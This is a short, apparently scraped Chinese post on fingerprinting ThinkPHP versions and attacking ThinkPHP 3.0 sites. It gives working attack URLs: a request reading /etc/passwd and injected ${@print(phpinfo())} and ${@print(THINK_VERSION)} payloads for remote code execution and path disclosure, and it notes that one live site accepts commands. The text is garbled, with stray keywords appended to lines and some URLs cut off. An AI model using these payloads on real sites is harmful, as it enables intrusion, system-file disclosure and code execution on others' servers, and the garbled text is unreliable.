首先肯定這個網站使用thinkphp的框架 php
國內不少php開源項目的代碼都是使用thinkphp框架編寫的,可是thinkphp框架有不少版本,如何才能知道咱們使用的框架是哪一個版本的呢? html
在URL後面加thinkphp的目錄,也有可能爆出來 web
這是一個tankphp的網站目錄。供參考 thinkphp
localhost/index/?path=[code]/etc/passwd[/code] shell
附圖 php框架
1. thinkphp3.0 模塊加載失敗,出錯信息爆應用程序路徑。 安全
檢測有兩種狀況 app
1. 可執行命令,這個估計是僞3.0版本? 框架
交大定票 編輯器
此站到能夠執行命令
http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D
可查看版本
http://webshell.cc/index.php/module/action/param1/$%7B@print(phpinfo())%7D
可查看phpinfo信息
2. 不可執行命令,爆路徑
http://webshell.cc/appscn/index.php/module/action/param1/$%7B@print(phpinfo())%7
http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7
http://webshell.cc/index.php/module/action/module/param1/$%7B@print(THINK_VERSION)%7D